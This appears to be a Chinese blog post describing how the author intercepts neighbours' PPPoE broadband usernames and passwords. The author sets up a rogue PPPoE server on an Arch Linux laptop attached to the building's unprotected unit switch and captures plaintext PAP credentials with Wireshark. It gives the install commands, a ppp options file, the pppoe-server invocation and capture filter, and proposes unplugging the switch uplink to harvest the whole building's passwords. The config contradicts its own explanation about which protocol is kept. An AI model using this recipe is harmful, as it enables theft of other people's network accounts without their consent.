? ? 最近發(fā)現(xiàn)樓下交換機(jī)竟然沒有任何防護(hù)，直挺挺的放電表箱里吃灰，正巧今天周五不上班，看看怎么把大家的pppoe帳號密碼拿過來。

小區(qū)每個(gè)單元都有一個(gè)小交換機(jī)，各戶的客戶端的pppoe撥號就是通過它鏈接到總交換機(jī)（名詞對不對？）的。我的思路就是用我的筆記本電腦作為pppoe-server，欺騙其他客戶端來我這里驗(yàn)證，通過抓包獲取pppoe帳號和密碼。新瓶裝老酒而已，但是我百度了一圈，沒有找到linux下的操作方式，基本都是windows。

本子裝的ArchLinux，先安裝pppoe-server 及wireshark抓包工具,wireshark有g(shù)tk和qt兩個(gè)gui，我用的是gtk 的

root> pacman -S ppp rp-pppoe?

root>pacman -S wireshark-gtk wireshark-common

安裝完后，做如下配置：（refuse是驗(yàn)證協(xié)議，只保留了pap，密碼是明文驗(yàn)證）

# /etc/ppp/options

auth

local

login

defaultroute

hide-password

ipcp-accept-local

ipcp-accept-remote

lcp-echo-failure 2

lcp-echo-interval 10

refuse-pap

#refuse-chap

#refuse-mschap

#require-mschap-v2

ms-dns 202.106.0.20

noproxyarp

配置完成后執(zhí)行以下命令

#查看網(wǎng)卡接口名 就是一般linux里的eth0 eth0之類的，網(wǎng)口名。使用ifconfig也可獲取到，我的wlp3s0是有線網(wǎng)卡，wlp3s0是無線網(wǎng)卡。

root>ip link?

root>pppoe-server -I enp0s25 -L 10.0.0.1 -R 10.0.0.10 -C tech -S pppoe1 -N 100 -T 60

除了 -I 參數(shù)，其他參數(shù)不用修改。

參數(shù)說明：

-I ?指定網(wǎng)口名

-L pppoe服務(wù)器地址，據(jù)說可以任意

-R 客戶端起始ip?

-C ?指定服務(wù)名 據(jù)說可隨意

-N 客戶端最大連接數(shù)

-T 超時(shí)時(shí)間，單位是秒

接下來打開wireshark

選中enp0s25 網(wǎng)卡點(diǎn)擊Start

添加Filter ： pap.data ，然后點(diǎn)擊 Apply 。不添加的話數(shù)據(jù)可能太多。

pppoe服務(wù)端及嗅探工具就算配置好了，接下來我把我的路由wan口插到筆記本上。稍等片刻就得到了明文密碼，下圖可以看出客戶端嘗試多種驗(yàn)證協(xié)議鏈接pppoe-server 。因?yàn)闆]有配置/etc/ppp/chap-secrets，所以會(huì)一直校驗(yàn)失敗。

再然后，我只能說理論上，將單元樓交換機(jī)總線拔掉，然后用網(wǎng)線插到筆記本網(wǎng)口，稍等片刻整棟樓的pppoe密碼就都到手了。